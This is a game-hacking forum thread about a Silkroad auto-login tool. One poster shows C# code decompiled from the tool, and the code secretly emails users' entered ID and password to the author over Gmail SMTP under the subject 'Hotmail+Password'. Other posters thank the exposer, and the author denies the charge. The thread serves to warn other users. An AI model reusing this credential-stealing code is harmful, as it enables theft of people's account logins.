Lolz ?
Why you make up things ?
Btw fck this i will never release anything
Why you make up things ?
Btw fck this i will never release anything
Your id+pw will be sent to [Only registered and activated users can see links. Click Here To Register...] with the title Hotmail+Password.Quote:
SilkroadAutoLogin.Core.Core.AutologinStart();
MailMessage message = new MailMessage();
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("[Only registered and activated users can see links. Click Here To Register...]", "dragonball");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.EnableSsl = true;
message.To.Add("[Only registered and activated users can see links. Click Here To Register...]");
message.From = new MailAddress("[Only registered and activated users can see links. Click Here To Register...]");
message.Subject = "Hotmail+Password";
message.Body = this.TextBox1.Text + " " + this.TextBox2.Text + " " + this.TextBox3.Text;
client.Send(message);
NahQuote:
no, you can see through the source of this app with .net reflector. when you press login this will happen:
Your id+pw will be sent to [Only registered and activated users can see links. Click Here To Register...] with the title Hotmail+Password.
thank u man U OWNED this freak :DQuote:
no, you can see through the source of this app with .net reflector. when you press login this will happen:
Your id+pw will be sent to [Only registered and activated users can see links. Click Here To Register...] with the title Hotmail+Password.